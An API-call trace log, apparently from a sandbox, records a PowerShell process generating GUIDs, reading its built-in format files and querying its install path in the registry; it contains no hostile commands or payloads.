	[0845.532] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xdfdd34ef, Data2=0x294b, Data3=0x47a7, Data4=([0]=0x8f, [1]=0x3, [2]=0x2d, [3]=0x2b, [4]=0xc6, [5]=0xbb, [6]=0xcb, [7]=0x80))) returned 0x0
	[0845.533] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xea2961ea, Data2=0xadec, Data3=0x47fc, Data4=([0]=0xbb, [1]=0xab, [2]=0x81, [3]=0x11, [4]=0xb9, [5]=0x88, [6]=0xa7, [7]=0xc5))) returned 0x0
	[0845.533] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x5d1c7e9f, Data2=0x6d97, Data3=0x4e0f, Data4=([0]=0x87, [1]=0x90, [2]=0x44, [3]=0xa0, [4]=0xa7, [5]=0x43, [6]=0x74, [7]=0xa0))) returned 0x0
	[0845.533] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0845.533] GetFileType (hFile=0x2f4) returned 0x1
	[0845.533] SetErrorMode (uMode=0x1) returned 0x1
	[0845.533] GetFileType (hFile=0x2f4) returned 0x1
	[0845.533] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0845.534] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0845.535] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0845.535] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0845.535] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0845.535] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0845.535] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.732] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.732] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.733] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.733] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.734] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.734] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.734] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.734] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.734] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.735] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.735] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.736] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.736] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.736] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.737] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0xe67, lpOverlapped=0x0) returned 1
	[0846.737] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2467, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2467*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0846.737] ReadFile (in: hFile=0x2f4, lpBuffer=0x31f2e98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x31f2e98*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0846.737] CloseHandle (hObject=0x2f4) returned 1
	[0846.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0846.738] SetErrorMode (uMode=0x1) returned 0x1
	[0846.738] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d320 | out: lpFileInformation=0x22d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0846.738] SetErrorMode (uMode=0x1) returned 0x1
	[0846.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0846.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d408 | out: phkResult=0x22d408*=0x2f4) returned 0x0
	[0846.738] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d38c, lpData=0x0, lpcbData=0x22d388*=0x0 | out: lpType=0x22d38c*=0x1, lpData=0x0, lpcbData=0x22d388*=0x56) returned 0x0
	[0846.738] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8310
	[0846.738] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d35c, lpData=0x1b9e8310, lpcbData=0x22d358*=0x56 | out: lpType=0x22d35c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d358*=0x56) returned 0x0
	[0846.738] CoTaskMemFree (pv=0x1b9e8310) 
	[0846.739] RegCloseKey (hKey=0x2f4) returned 0x0
	[0846.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0846.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0846.741] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x607e263d, Data2=0xa7c9, Data3=0x47dd, Data4=([0]=0x85, [1]=0x69, [2]=0x85, [3]=0x7d, [4]=0x67, [5]=0x64, [6]=0xe, [7]=0x7c))) returned 0x0
	[0846.742] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xec27e7e6, Data2=0x9b6f, Data3=0x4cf8, Data4=([0]=0x9d, [1]=0xf6, [2]=0x54, [3]=0xb1, [4]=0xeb, [5]=0xe2, [6]=0xcf, [7]=0x12))) returned 0x0
	[0846.742] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x9f3fa384, Data2=0x31bc, Data3=0x4f95, Data4=([0]=0xbf, [1]=0xfe, [2]=0x51, [3]=0xcf, [4]=0xa5, [5]=0xa9, [6]=0x4d, [7]=0x84))) returned 0x0
	[0846.743] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xd4d80f45, Data2=0x9a2d, Data3=0x4620, Data4=([0]=0x90, [1]=0xef, [2]=0x90, [3]=0xed, [4]=0xc2, [5]=0x33, [6]=0x5e, [7]=0xd7))) returned 0x0
	[0846.743] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x3a018420, Data2=0x9ac1, Data3=0x4ca5, Data4=([0]=0xa1, [1]=0x30, [2]=0x8b, [3]=0x68, [4]=0xe1, [5]=0xce, [6]=0x11, [7]=0x37))) returned 0x0
	[0846.744] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xbd715275, Data2=0x980f, Data3=0x4c85, Data4=([0]=0x96, [1]=0xf8, [2]=0x70, [3]=0xc4, [4]=0x56, [5]=0xb4, [6]=0xaf, [7]=0xe0))) returned 0x0
	[0846.744] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xa620d3ef, Data2=0x342e, Data3=0x4b00, Data4=([0]=0xb3, [1]=0x59, [2]=0x36, [3]=0xfd, [4]=0x34, [5]=0xbb, [6]=0x8d, [7]=0x7b))) returned 0x0
	[0846.745] VirtualQuery (in: lpAddress=0x22bfe0, lpBuffer=0x22cea0, dwLength=0x30 | out: lpBuffer=0x22cea0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0846.746] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x4fe3c02, Data2=0xf591, Data3=0x4fac, Data4=([0]=0xa7, [1]=0x1a, [2]=0x32, [3]=0x1b, [4]=0x19, [5]=0x42, [6]=0x9f, [7]=0x81))) returned 0x0
	[0846.747] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x9c6d0cba, Data2=0x1070, Data3=0x4688, Data4=([0]=0x81, [1]=0xb5, [2]=0x92, [3]=0xc6, [4]=0x9f, [5]=0x5f, [6]=0x3d, [7]=0xa6))) returned 0x0
	[0846.747] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x34441d45, Data2=0x1999, Data3=0x49cf, Data4=([0]=0xb7, [1]=0x0, [2]=0xbf, [3]=0xf2, [4]=0xe7, [5]=0x83, [6]=0xc0, [7]=0x5b))) returned 0x0
	[0846.748] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x46292482, Data2=0xa138, Data3=0x46b3, Data4=([0]=0x97, [1]=0x1e, [2]=0xc0, [3]=0xeb, [4]=0x88, [5]=0x1, [6]=0xec, [7]=0x58))) returned 0x0
	[0846.748] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x99bb7f35, Data2=0xcfe5, Data3=0x4a90, Data4=([0]=0xa4, [1]=0xce, [2]=0xd9, [3]=0x39, [4]=0xab, [5]=0x4, [6]=0x67, [7]=0xfe))) returned 0x0
	[0846.749] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x3139af7c, Data2=0x9d4d, Data3=0x48b9, Data4=([0]=0x87, [1]=0xf6, [2]=0x1, [3]=0x14, [4]=0xb8, [5]=0xa6, [6]=0x5a, [7]=0xbf))) returned 0x0
	[0846.749] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x5456d40e, Data2=0x298e, Data3=0x49ef, Data4=([0]=0xb9, [1]=0xb5, [2]=0x9c, [3]=0x5f, [4]=0xed, [5]=0x60, [6]=0xf2, [7]=0x9))) returned 0x0
	[0846.749] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x3ad53f8e, Data2=0x6739, Data3=0x4879, Data4=([0]=0xa7, [1]=0xea, [2]=0x6d, [3]=0xf7, [4]=0xd8, [5]=0x6a, [6]=0x57, [7]=0x7a))) returned 0x0
	[0846.749] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x1a2be2e9, Data2=0x4ab4, Data3=0x4a87, Data4=([0]=0xbe, [1]=0x1f, [2]=0x13, [3]=0xa7, [4]=0xbc, [5]=0xed, [6]=0xa, [7]=0x47))) returned 0x0
	[0846.749] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x5c79f032, Data2=0x4f8d, Data3=0x47c7, Data4=([0]=0xbe, [1]=0x60, [2]=0xab, [3]=0x30, [4]=0xf9, [5]=0x1, [6]=0xaa, [7]=0xf1))) returned 0x0
	[0846.749] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x932ec203, Data2=0x6b70, Data3=0x4ca9, Data4=([0]=0x9f, [1]=0xd0, [2]=0xe3, [3]=0x3e, [4]=0xac, [5]=0x7f, [6]=0x27, [7]=0x2f))) returned 0x0
	[0846.750] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x26c2c579, Data2=0x2b8, Data3=0x4d50, Data4=([0]=0xb0, [1]=0xf1, [2]=0x4b, [3]=0xf9, [4]=0xac, [5]=0x86, [6]=0x68, [7]=0x37))) returned 0x0
	[0846.750] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x1c1640aa, Data2=0xa969, Data3=0x4c05, Data4=([0]=0x81, [1]=0x83, [2]=0x45, [3]=0xcf, [4]=0x17, [5]=0x33, [6]=0xfc, [7]=0xbf))) returned 0x0
	[0846.750] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x3ad7f520, Data2=0x1349, Data3=0x482b, Data4=([0]=0x91, [1]=0xfe, [2]=0xa0, [3]=0xb0, [4]=0x85, [5]=0x8f, [6]=0x7a, [7]=0x4d))) returned 0x0
	[0846.750] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x5cac4013, Data2=0x51a0, Data3=0x4815, Data4=([0]=0xbb, [1]=0x85, [2]=0x13, [3]=0x76, [4]=0xea, [5]=0x98, [6]=0x2e, [7]=0x19))) returned 0x0
	[0846.750] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xdff7d3da, Data2=0x32e5, Data3=0x42c1, Data4=([0]=0xb6, [1]=0x30, [2]=0xd0, [3]=0x49, [4]=0x35, [5]=0x1, [6]=0xe0, [7]=0x57))) returned 0x0
	[0846.750] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x18864b1b, Data2=0xaef5, Data3=0x4114, Data4=([0]=0x9b, [1]=0x2a, [2]=0x96, [3]=0xa0, [4]=0x30, [5]=0x28, [6]=0xf7, [7]=0x27))) returned 0x0
	[0846.751] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xcd325dda, Data2=0xabe8, Data3=0x47a2, Data4=([0]=0x9b, [1]=0x4b, [2]=0xdd, [3]=0x3f, [4]=0xc, [5]=0x3d, [6]=0xd9, [7]=0xe))) returned 0x0
	[0846.751] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xbba436fb, Data2=0x5bf7, Data3=0x4b26, Data4=([0]=0x96, [1]=0x16, [2]=0x13, [3]=0xa0, [4]=0x6d, [5]=0xb1, [6]=0xfb, [7]=0xc4))) returned 0x0
	[0846.751] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xac0289e2, Data2=0xf4e4, Data3=0x4d4f, Data4=([0]=0xba, [1]=0xc3, [2]=0x55, [3]=0x5c, [4]=0x88, [5]=0xe6, [6]=0x59, [7]=0x94))) returned 0x0
	[0846.751] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x884e5bf, Data2=0x95bc, Data3=0x4b3b, Data4=([0]=0xbb, [1]=0xbf, [2]=0x8e, [3]=0x64, [4]=0xf1, [5]=0x4, [6]=0xba, [7]=0x99))) returned 0x0
	[0846.751] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x6cc04363, Data2=0xf238, Data3=0x4357, Data4=([0]=0xaf, [1]=0xe6, [2]=0x51, [3]=0x30, [4]=0x79, [5]=0xe3, [6]=0x92, [7]=0x6c))) returned 0x0
	[0846.751] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xc39b2cfd, Data2=0xccdd, Data3=0x45e2, Data4=([0]=0xa1, [1]=0x24, [2]=0xa0, [3]=0x68, [4]=0x29, [5]=0x20, [6]=0x39, [7]=0x0))) returned 0x0
	[0846.751] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x6717ef30, Data2=0x2dd1, Data3=0x481a, Data4=([0]=0x9f, [1]=0x6c, [2]=0x37, [3]=0x8e, [4]=0x5f, [5]=0x4d, [6]=0xa1, [7]=0x52))) returned 0x0
	[0846.752] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xd48b0c86, Data2=0xb885, Data3=0x4701, Data4=([0]=0x8a, [1]=0xd0, [2]=0x25, [3]=0xb, [4]=0xb0, [5]=0xd8, [6]=0x5e, [7]=0xc))) returned 0x0
	[0846.752] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x42daa5c4, Data2=0x9cfb, Data3=0x49ce, Data4=([0]=0xb7, [1]=0x62, [2]=0xc3, [3]=0x73, [4]=0x97, [5]=0xd, [6]=0xd0, [7]=0x11))) returned 0x0
	[0846.753] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x6899f4f5, Data2=0xc47d, Data3=0x4e52, Data4=([0]=0xbf, [1]=0x3d, [2]=0x58, [3]=0x5e, [4]=0x68, [5]=0xb3, [6]=0xd0, [7]=0x11))) returned 0x0
	[0846.753] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x9dfc0853, Data2=0x1706, Data3=0x4cc4, Data4=([0]=0x88, [1]=0xad, [2]=0x75, [3]=0xc0, [4]=0x17, [5]=0x19, [6]=0x42, [7]=0xc1))) returned 0x0
	[0846.753] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xf7e63e71, Data2=0x7b3c, Data3=0x4dab, Data4=([0]=0xbb, [1]=0x93, [2]=0x4a, [3]=0x4b, [4]=0xb, [5]=0xf3, [6]=0xbf, [7]=0x72))) returned 0x0
	[0846.754] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x571bdda7, Data2=0x7b70, Data3=0x48f9, Data4=([0]=0x9f, [1]=0x77, [2]=0xd2, [3]=0xd6, [4]=0x6d, [5]=0xea, [6]=0x8f, [7]=0x73))) returned 0x0
	[0846.754] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x82e9ca0e, Data2=0x92ac, Data3=0x428f, Data4=([0]=0xb8, [1]=0x14, [2]=0xdf, [3]=0x69, [4]=0x19, [5]=0xe3, [6]=0xd1, [7]=0x17))) returned 0x0
	[0846.754] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x9f5c4559, Data2=0x9d4f, Data3=0x48f0, Data4=([0]=0xb6, [1]=0x5b, [2]=0x9b, [3]=0x7b, [4]=0xa7, [5]=0xd3, [6]=0xf3, [7]=0xf8))) returned 0x0
	[0846.754] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x5c6fbec5, Data2=0xaaad, Data3=0x46dd, Data4=([0]=0x98, [1]=0x5f, [2]=0xe2, [3]=0x8e, [4]=0x51, [5]=0x0, [6]=0xdc, [7]=0x5f))) returned 0x0
	[0846.754] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x920ede94, Data2=0x8ea4, Data3=0x4846, Data4=([0]=0xb9, [1]=0x70, [2]=0x83, [3]=0x54, [4]=0x4, [5]=0x25, [6]=0xa5, [7]=0x60))) returned 0x0
	[0846.754] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x63b15475, Data2=0xe953, Data3=0x46b7, Data4=([0]=0x85, [1]=0x8a, [2]=0xa, [3]=0x30, [4]=0x4c, [5]=0x3, [6]=0xc3, [7]=0xb))) returned 0x0
	[0846.755] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xcfa0d973, Data2=0x376d, Data3=0x4dac, Data4=([0]=0xa6, [1]=0x83, [2]=0x46, [3]=0x49, [4]=0x24, [5]=0xa7, [6]=0x7e, [7]=0x7c))) returned 0x0
	[0846.755] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xcc5ca0e4, Data2=0xdeb, Data3=0x4d53, Data4=([0]=0x8a, [1]=0x11, [2]=0x27, [3]=0x35, [4]=0xdb, [5]=0x93, [6]=0xb0, [7]=0x6c))) returned 0x0
	[0846.755] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x9eaf0df2, Data2=0xfea0, Data3=0x4961, Data4=([0]=0x8f, [1]=0xc5, [2]=0xce, [3]=0xad, [4]=0x29, [5]=0xdd, [6]=0x89, [7]=0x30))) returned 0x0
	[0846.755] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x195e1dd9, Data2=0x5dba, Data3=0x41eb, Data4=([0]=0xb4, [1]=0x8e, [2]=0x23, [3]=0xf4, [4]=0x69, [5]=0x63, [6]=0xcc, [7]=0xba))) returned 0x0
	[0846.755] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xe5f2a9b4, Data2=0x7129, Data3=0x4fde, Data4=([0]=0xab, [1]=0xdf, [2]=0xba, [3]=0x9b, [4]=0x70, [5]=0xce, [6]=0x8d, [7]=0x3a))) returned 0x0
	[0846.756] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x2399583a, Data2=0xc493, Data3=0x4060, Data4=([0]=0x9e, [1]=0x20, [2]=0x71, [3]=0x76, [4]=0x36, [5]=0x2d, [6]=0x28, [7]=0x19))) returned 0x0
	[0846.756] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0846.756] GetFileType (hFile=0x2f4) returned 0x1
	[0846.756] SetErrorMode (uMode=0x1) returned 0x1
	[0846.756] GetFileType (hFile=0x2f4) returned 0x1
	[0846.756] ReadFile (in: hFile=0x2f4, lpBuffer=0x3350e30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3350e30*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.757] ReadFile (in: hFile=0x2f4, lpBuffer=0x3350e30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3350e30*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.757] ReadFile (in: hFile=0x2f4, lpBuffer=0x3350e30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3350e30*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.758] ReadFile (in: hFile=0x2f4, lpBuffer=0x3350e30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3350e30*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0846.765] ReadFile (in: hFile=0x2f4, lpBuffer=0x2fc24e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2fc24e0*, lpNumberOfBytesRead=0x22d378*=0x8b4, lpOverlapped=0x0) returned 1
	[0846.766] ReadFile (in: hFile=0x2f4, lpBuffer=0x2fc2154, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2fc2154*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
